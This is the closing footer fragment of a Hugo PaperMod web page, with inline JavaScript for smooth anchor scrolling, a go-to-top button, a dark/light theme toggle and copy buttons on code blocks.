<span>Powered by
<a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a> &
        <a href=https://git.io/hugopapermod rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></a><script>let menu=document.getElementById("menu");menu&&(menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)}),document.querySelectorAll('a[href^="#"]').forEach(e=>{e.addEventListener("click",function(t){t.preventDefault();var e=this.getAttribute("href").substr(1);window.matchMedia("(prefers-reduced-motion: reduce)").matches?document.querySelector(`[id='${decodeURIComponent(e)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(e)}']`).scrollIntoView({behavior:"smooth"}),e==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${e}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove("dark"),localStorage.setItem("pref-theme","light")):(document.body.classList.add("dark"),localStorage.setItem("pref-theme","dark"))})</script><script>document.querySelectorAll("pre > code").forEach(t=>{const n=t.parentNode.parentNode,e=document.createElement("button");e.classList.add("copy-code"),e.innerText="copy";function s(){e.innerText="copied!",setTimeout(()=>{e.innerText="copy"},2e3)}e.addEventListener("click",o=>{if("clipboard"in navigator){navigator.clipboard.writeText(t.textContent),s();return}const e=document.createRange();e.selectNodeContents(t);const n=window.getSelection();n.removeAllRanges(),n.addRange(e);try{document.execCommand("copy"),s()}catch(e){}n.removeRange(e)}),n.classList.contains("highlight")?n.appendChild(e):n.parentNode.firstChild==n||(t.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?t.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(e):t.parentNode.appendChild(e))})</script></body></html>